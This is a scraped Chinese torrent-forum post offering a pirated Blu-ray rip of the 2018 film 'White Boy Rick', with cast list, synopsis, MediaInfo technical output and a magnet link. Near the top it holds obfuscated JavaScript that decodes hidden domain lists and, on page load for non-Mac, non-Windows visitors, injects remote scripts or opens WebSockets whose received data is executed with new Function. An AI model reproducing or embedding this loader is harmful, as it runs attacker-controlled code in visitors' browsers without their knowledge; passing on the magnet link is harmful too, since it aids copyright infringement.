白人男孩瑞克[中文字幕].White.Boy.Rick.2018.1080p.BluRay.x264.DTS-迅雷下载 11.90GB

版主小s 23天前 106

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 白人男孩瑞克/白人男孩里克

◎片 名 White Boy Rick

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 犯罪

◎语 言 英语

◎上映日期 2018-08-31(特柳赖德电影节) / 2018-09-14(美国)

◎豆瓣评分 6.2/10 from 902 users

◎豆瓣链接 https://movie.douban.com/subject/26704843/

◎片 长 111分钟

◎导 演 扬·德芒热 Yann Demange

◎编 剧 安迪·韦斯 Andy Weiss / 罗根·米勒 Logan Miller / 诺亚·米勒 Noah Miller

◎主 演 马修·麦康纳 Matthew McConaughey

里奇·梅里特 Richie Merritt

蓓尔·波利 Bel Powley

詹妮弗·杰森·李 Jennifer Jason Leigh

布莱恩·泰里·亨利 Brian Tyree Henry

罗利·科奇瑞恩 Rory Cochrane

RJ·赛勒 RJ Cyler

乔纳森·梅杰斯 Jonathan Majors

埃迪·马森 Eddie Marsan

泰勒·佩姬 Taylour Paige

布鲁斯·邓恩 Bruce Dern

派珀·劳瑞 Piper Laurie

劳伦斯·阿迪莫拉 Lawrence Adimora

海蒂·索兹蒙 Heidi Sulzman

布拉德·卡特 Brad Carter

梅甘·玛丽·威尔逊 Megan Marie Wilson

斯科特·康纳斯 Scott Connors

盖内尔·W·斯洛曼 Gaynelle W. Sloman

黛米卡扎尼斯 Demi Kazanis

理查德·杜恩 Richard Doone

可亚娜·西蒙妮·辛普森 Kyanna Simone Simpson

凯利·佩特里西 Kelley Petrisi

◎标 签 犯罪 | 美国 | 真实事件改编 | 2018 | 剧情 | 传记 | 社会 | 黑色幽默

◎简 介

上个世界80年代中期,年仅14岁的小理查德·沃舍成为了一名政府执法部门的线人,后来变成一个主要的毒贩。这样的双面生活,也让他与政府产生了摩擦,当有一天他被发现携有17磅的海洛因,而那时他刚刚17岁。他被投入监狱,并被判处终身监禁,那么问题来了,他沦落如此,当初让他做线人的联邦政府该负多少责任?

  1. General

  2. Unique ID : 102787161087386290390496485586465939269 (0x4D54164F0C42EBFF91738249B6FF5F45)

  3. Complete name : White.Boy.Rick.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.9 GiB

  7. Duration : 1 h 51 min

  8. Overall bit rate : 15.3 Mb/s

  9. Movie name : White Boy Rick 2018

  10. Encoded date : UTC 2021-07-02 07:21:05

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 51 min

  25. Bit rate : 13.8 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.372

  36. Stream size : 10.7 GiB (90%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.62 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 51 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossy

  57. Stream size : 1.17 GiB (10%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4612 (0x1204)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 43 min

  70. Bit rate : 23.7 kb/s

  71. Count of elements : 2562

  72. Stream size : 17.6 MiB (0%)

  73. Title : chs

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4613 (0x1205)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 43 min

  86. Bit rate : 24.0 kb/s

  87. Count of elements : 2562

  88. Stream size : 17.8 MiB (0%)

  89. Title : cht

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 44 min

  102. Bit rate : 47.6 kb/s

  103. Count of elements : 3506

  104. Stream size : 35.4 MiB (0%)

  105. Language : English

  106. Default : Yes

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Menu

  110. 00:00:00.000 : Chapter 01

  111. 00:07:10.888 : Chapter 02

  112. 00:12:43.721 : Chapter 03

  113. 00:18:24.895 : Chapter 04

  114. 00:25:09.633 : Chapter 05

  115. 00:32:02.462 : Chapter 06

  116. 00:38:46.407 : Chapter 07

  117. 00:45:41.613 : Chapter 08

  118. 00:52:10.460 : Chapter 09

  119. 00:59:10.672 : Chapter 10

  120. 01:05:38.684 : Chapter 11

  121. 01:12:06.071 : Chapter 12

  122. 01:18:55.063 : Chapter 13

  123. 01:25:59.112 : Chapter 14

  124. 01:30:55.825 : Chapter 15

  125. 01:37:23.337 : Chapter 16


TAGS 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:BC6CC349B5F8531E5B26B58F07B4E4E9812B8258
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回